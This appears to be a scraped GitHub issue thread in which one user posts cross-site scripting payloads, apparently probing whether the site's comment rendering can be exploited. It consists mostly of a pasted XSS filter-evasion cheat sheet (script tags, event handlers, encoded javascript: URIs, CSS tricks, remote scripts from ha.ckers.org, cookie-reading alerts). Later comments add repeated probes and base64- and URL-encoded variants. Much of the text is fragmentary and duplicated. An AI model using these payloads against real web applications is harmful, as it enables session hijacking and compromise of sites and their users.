asd

[imnarendrabhati]

123');alert(document.cookie);('

">

'>Click Me For

Google<>

prettyPhoto/2,/

<iframe onmouseover=javascript:alert(1)>

String.fromCharCode(60)scriptString.fromCalert(String.fromCharCode(34)XSSString.fromCharCode(34))String.fromCharCode(60)/scriptS

;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";
alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--

</SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>

'';!--"=&{()}

SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

IMG SRC=javascript:alert('XSS')>

IMG SRC=JaVaScRiPt:alert('XSS')>

<IMG SRC=javascript:alert("XSS")>

IMG SRC=javascript:alert("RSnake says, 'XSS'")>

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

<IMG SRC= onmouseover="alert('xxs')">

<IMG SRC=javascript:alert(
'XSS')>

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>

MG SRC="jav ascript:alert('XSS');">

IMG SRC="jav ascript:alert('XSS');">

IMG SRC="jav ascript:alert('XSS');">

perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";' > out

<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>

<SCRIPT>alert("XSS");//<</SCRIPT>

SCRIPT SRC=http://ha.ckers.org/xss.js?< B >

SCRIPT SRC=//ha.ckers.org/.j>

<IMG SRC="javascript:alert('XSS')"

<iframe src=http://ha.ckers.org/scriptlet.html <

";alert('XSS');//

/TITLE><SCRIPT>alert("XSS");</SCRIPT>

INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

IMG DYNSRC="javascript:alert('XSS')">

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE>

• XSS
  

  IMG SRC='vbscript:msgbox("XSS")'>

  BODY ONLOAD=alert('XSS')>

  BR SIZE="&{alert('XSS')}">

  LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

  STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>

  META HTTP-EQUIV="Link" Content="http://ha.ckers.org/xss.css; REL=stylesheet">

  <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>

  IMG STYLE="xss:expr/XSS/ession(alert('XSS'))">

  xp/*

  <STYLE TYPE="text/javascript">alert('XSS');</STYLE>

  STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE>

  STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

  XSS STYLE="behavior: url(xss.htc);">

  ¼script¾alert(¢XSS¢)¼/script%

  META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">

  META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

  <IFRAME SRC="javascript:alert('XSS');"></IFRAME> <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

  TABLE>

  DIV STYLE="background-image: url(javascript:alert('XSS'))"> BASE HREF="javascript:alert('XSS');//"> BJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"> MBED SRC="http://ha.ckers.Using an EMBED tag you can embed a Flash movie that contains XSS. Click here for a demo. If you add the attributes allowScriptAccess="never" and allownetworking="internal" it can mitigate this risk (thank you to Jonathan Vanasco for the info).: org/xss.swf" AllowScriptAccess="always"> a="get"; b="URL(""; c="javascript:"; d="alert('XSS');")"; eval(a+b+c+d); XML ID="xss"> XML SRC="xsstest.xml" ID=I> "> <SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>\

[imnarendrabhati]

hello

123');alert(document.cookie);('

">

'>Click Me For

Google<>

prettyPhoto/2,/

<iframe onmouseover=javascript:alert(1)> String.fromCharCode(60)scriptString.fromCalert(String.fromCharCode(34)XSSString.fromCharCode(34))String.fromCharCode(60)/scriptS ;alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//"; alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//-- ></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> '';!--"=&{()} SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

IMG SRC=javascript:alert('XSS')> IMG SRC=JaVaScRiPt:alert('XSS')>

IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>

<SCRIPT>alert("XSS")</SCRIPT>"> IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

IMG SRC=javascript:alert('XSS')>

MG SRC="jav ascript:alert('XSS');"> IMG SRC="jav ascript:alert('XSS');"> IMG SRC="jav ascript:alert('XSS');"> perl -e 'print "

";' > out

[imnarendrabhati]

#1

[imnarendrabhati]

#1

[imnarendrabhati]

https%3A%2f%2fgithub.com%2fbhati123%2ftesting-new%2fissues%2f1%2funlock

[imnarendrabhati]

'>Click Me For

Google<>

[imnarendrabhati]

hello

[imnarendrabhati]

helloagain

[imnarendrabhati]

'>Click Me For

Google<>

[imnarendrabhati]

'>Click Me For

Google<>

[imnarendrabhati]

'>Click Me For

Google<>

[imnarendrabhati]

'>Click Me For

Google<>

[imnarendrabhati]

'>Click Me Forasdad

Google<>

[imnarendrabhati]

'>Click Me For

Gadadadoogle<>
a

[imnarendrabhati]

");}javascript:alert(/BCXSS/)

[imnarendrabhati]

Iik7fWphdmFzY3JpcHQ6YWxlcnQoL0JDWFNTLyk7

[imnarendrabhati]

%22%29%3B%7D%6A%61%76%61%73%63%72%69%70%74%3A%61%6C%65%72%74%28%2F%42%43%58%53%53%2F%29%3B

[imnarendrabhati]

"}("javascript:alert('NEWXSS')")

[imnarendrabhati]

"}("javascript:alert(/3RDNEW/)")

[imnarendrabhati]

"}("javascript:alert(/3RDNEW/)")
"}("javascript:alert(/3RDNEW/)")
"}("javascript:alert(/3RDNEW/)")

<SCRIPT>alert(/4THNEW/)</SCRIPT>

[imnarendrabhati]

'>Click Me For

Google<>

[imnarendrabhati]

'>Click Me For

Google<>